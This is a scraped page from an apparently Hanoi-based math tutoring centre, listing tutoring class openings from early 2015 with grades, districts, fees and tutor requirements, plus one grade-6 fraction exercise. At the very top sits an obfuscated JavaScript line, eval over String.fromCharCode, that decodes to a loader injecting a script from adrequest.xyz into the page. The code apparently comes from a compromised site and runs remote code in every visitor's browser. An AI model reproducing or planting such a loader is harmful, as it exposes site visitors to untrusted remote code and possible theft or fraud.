var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

Danh sách lớp mới cần gia sư dạy Toán

B140301 – Tìm gia sư dạy Toán lớp 5 ở ĐH Công Nghiệp Hà Nội – Từ Liêm

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B140301 – Tìm gia sư dạy Toán lớp 5 ở ĐH Công Nghiệp Hà Nội – Từ Liêm – Hà Nội. Thông tin về mã lớp B140301: Trình độ học tập: Lớp 5, Học lực học sinh: Tốt, muốn ôn luyện thi vào lớp 6 […]

B120302 – Tìm gia sư dạy Toán lớp 10 ở Đào Tấn – Ba Đình

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B120302 – Tìm gia sư dạy Toán lớp 10 ở Đào Tấn – Ba Đình – Hà Nội. Thông tin về mã lớp B120302: Trình độ học tập: Lớp 10, Học lực học sinh: Tốt, đang học trường Chu Văn An Giới tính: Học sinh […]

B120301 – Tìm gia sư dạy Toán lớp 12 ở Dịch Vọng Hậu – Cầu Giấy

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B120301 – Tìm gia sư dạy Toán lớp 12 ở SVĐ Dịch Vọng Hậu – Cầu Giấy – Hà Nội. Thông tin về mã lớp B120301: Trình độ học tập: Lớp 12, Học lực học sinh: Tốt, Giới tính: Học sinh nữ, Địa điểm giảng […]

B090302 – Tìm gia sư dạy Toán lớp 12 ở Phạm Văn Đồng – Từ Liêm

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B090302 – Tìm gia sư dạy Toán lớp 12 ở Phạm Văn Đồng – Tư Liêm – Hà Nội. Thông tin về mã lớp Bo90302: Trình độ học tập: Lớp 12, Học lực học sinh: Tốt, Giới tính: Học sinh nữ, Địa điểm giảng dạy: Phạm […]

B090301 – Tìm gia sư dạy Toán lớp 12 ở SVĐ Mỹ Đình – Từ Liêm

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B090301 – Tìm gia sư dạy Toán lớp 12 ở SVĐ Mỹ Đình – Tư Liêm – Hà Nội. Thông tin về mã lớp Bo90301: Trình độ học tập: Lớp 12, Học lực học sinh: Tốt, Giới tính: Học sinh nữ, Địa điểm giảng dạy: […]

B030203 – Tìm gia sư dạy Toán lớp 5 ở Bạch Đằng – Hoàn Kiếm

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B030203 – Tìm gia sư dạy Toán lớp 5 ở Bạch Đằng – Hoàn Kiếm – Hà Nội. Thông tin về mã lớp Bo30203: Trình độ học tập: Lớp 5, Học lực học sinh: Trung Bình, Giới tính: Học sinh nữ, Địa điểm giảng dạy: Bạch […]

B030202 – Tìm gia sư dạy Toán lớp 5 ở Âu Cơ – Tây Hồ

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B030202 – Tìm gia sư dạy Toán lớp 5 ở Âu Cơ – Tây Hồ – Hà Nội. Thông tin về mã lớp Bo30202: Trình độ học tập: Lớp 5, Học lực học sinh: Khá – Giỏi, Giới tính: Học sinh nữ, Địa điểm giảng dạy: […]

B030201 – Tìm gia sư dạy Toán lớp 4 ở Phố Huế – Hà Nội

Trung tâm gia sư Toán Hà Nội thông báo mã lớp: B030201 – Tìm gia sư dạy Toán lớp 4 ở Phố Huế – Hà Nội. Thông tin về mã lớp Bo30201: Trình độ học tập: Lớp 4, Học lực học sinh: Khá, Giới tính: Học sinh nữ, Địa điểm giảng dạy: Phố Huế – Hà […]

Danh sách lớp mới cần giao ngày 28 – 02 – 2015

*** Danh sách các lớp mới chưa hẹn cần giao gấp ngày từ ngày 28/02/ 2015: 0. Gia sư Hóa lớp 10; 1 buổi/ tuần (Học vào tối thứ 4); 100K/ buổi; Định Công – Hoàng Mai; Yêu cầu Sinh viên nữ; 1. Luyện thi Ielts; 150K – 200k/ buổi; 3 buổi/ tuần ; Vạn […]

Danh sách lớp các lớp tổng hợp trước và sau tết cần giao ngày 27/02/2015

Trung tâm gia sư Toán Hà Nội Giỏi thông báo:  Danh sách các lớp mới môn Toán chưa giao ngày 26 – 01 – 2015. 1. Gia sư Toán lớp 7; 2 buổi/ tuần; 100K – 200K/ buổi; Thanh Bình – Hà Đông; Yêu cầu sinh viên nữ khoa Toán hoặc giáo viên nữ 2. […]

Danh sách các lớp mới môn Toán chưa giao ngày 26 – 01 – 2015

Trung tâm gia sư Toán Hà Nội Giỏi thông báo:  Danh sách các lớp mới môn Toán chưa giao ngày 26 – 01 – 2015. 1. Gia sư Toán – Văn – Anh lớp 5; 100K/ buổi; 2 buổi – 2 buổi – 1 buổi/ tuần ; Thạch Bàn – Long Biên cách trạm dừng […]

Danh sách lớp mới cần giao ngày 21 – 01 – 2015

[Danh sách lớp] – Trung tâm gia sư Toán thông báo danh sách lớp mới cần giao ngày 21 – 01 – 2015: 1. Gia sư tiếng anh lớp 11; 100k/buổi; 2 buổi/ tuần; Đê La Thành Y/C: Sinh viên nữ có kinh nghiệm (Ưu tiên ngoại ngữ) 2. Hóa 11; 100k – 200k/buổi; 2 […]

Toán lớp 6: Tìm các phân số a/b có giá trị bằng:

[Bài tập Toán lớp 6] – Tìm các phân số a/b có giá trị bằng: 36/45, biết BCNN (a, b) = 300. 21/35, biết UCLN (a, b) = 30. 15/35, biết UCLN (a, b).BCNN (a, b) = 3549

Danh sách lớp mới cập nhật ngày 19 – 01 – 2015:

Trung tâm gia sư Toán giỏi thông báo danh sách lớp mới cập nhật ngày 19 – 01 – 2015: 1. Gia sư Hóa lớp 10; 2 buổi/ tuần; 120K/ buổi; Giảng Võ – Ba Đình Y/C: SV nữ năm 3, 4 học trường ĐH Y hoặc ĐH Dược 2. Gia sư Toán lớp 10; […]

Danh sách lớp Toán Lý Hóa cần giao gấp ngày 08 – 01 – 2015

Trung tâm gia sư Toán Giỏi Hà Nội thông báo: Danh sách các lớp chưa hẹn cần giao gấp ngày 08 – 01 – 2015: 1. Gia sư Toán 10/ 2b – 100k/ Đối diện ĐH Kiến Trúc (đi vào 1km); Y/C: Sinh viên nữ năm 3 or 4, khoa toán sư phạm hoặc Khoa học […]

Danh sách lớp cần giao ngày 06 – 01 – 2015:

Thông báo danh sách lớp cần giao ngày 06 – 01 – 2015: 1. Gia sư Toán lớp 6; 2 buổi/ tuần; 100K – 200K/ buổi; Phúc Xá – Gia Lâm (Yên Phụ); Yêu cầu SV hoặc GV có kinh nghiệm 2. Gia sư Tiếng Anh lớp 2; 130k – 2b; SV nữ chuyên ngữ […]

Gia sư Toán – Tiếng Việt lớp 3 ở phố Hoàng Ngân

Trung tâm gia sư Toán Giỏi Hà Nội thông báo tìmGia sư Toán – Tiếng Việt lớp 3 ở phố Hoàng Ngân. Thông tin về học sinh: Trình độ: Toán – Tiếng Việt lớp 3 Học lực: Kém Lịch học: 2 buổi/ tuần Yêu cầu: Giáo viên dạy tiểu học Học phí: 200.000 VNĐ/ buổi/ […]

Gia sư Toán lớp 3 ở Xã Đàn – Đống Đa

Trung tâm gia sư Toán Giỏi Hà Nội thông báo tìm gia sư Toán lớp 3 ở Xã Đàn – Đống Đa. Thông tin về học sinh: Trình độ: Toán lớp 3 Học lực: Giỏi Lịch học: 2 buổi/ tuần Yêu cầu: Sinh viên nữ sư phạm Toán, có kinh nghiệm dạy học Học phí: […]

Gia sư Toán – Tiếng Việt lớp 3 ở Vĩnh Tuy – Hai Bà Trưng

Trung tâm gia sư Toán Giỏi Hà Nội thông báo tìm Gia sư Toán – Tiếng Việt lớp 3 ở Vĩnh Tuy – Hai Bà Trưng. Thông tin về học sinh: Trình độ: Toán – Tiếng Việt lớp 3 Học lực: Trung Bình – Khá Lịch học: 3 buổi/ tuần; Yêu cầu: Sinh viên có […]

Gia sư Toán – Tiếng Việt – Tiếng Anh lớp 3 ở Nguyễn Trãi – Thanh Xuân

Trung tâm gia sư Toán Giỏi Hà Nội thông báo tìm gia sư Toán – Tiếng Việt – Tiếng Anh lớp 2 ở Tô Vĩnh Diện – Thanh Xuân. Thông tin về học sinh: Trình độ: Toán – Tiếng Việt – Tiếng Anh lớp 3 Học lực: Trung Bình Lịch học: Trong 2 tuần đầu […]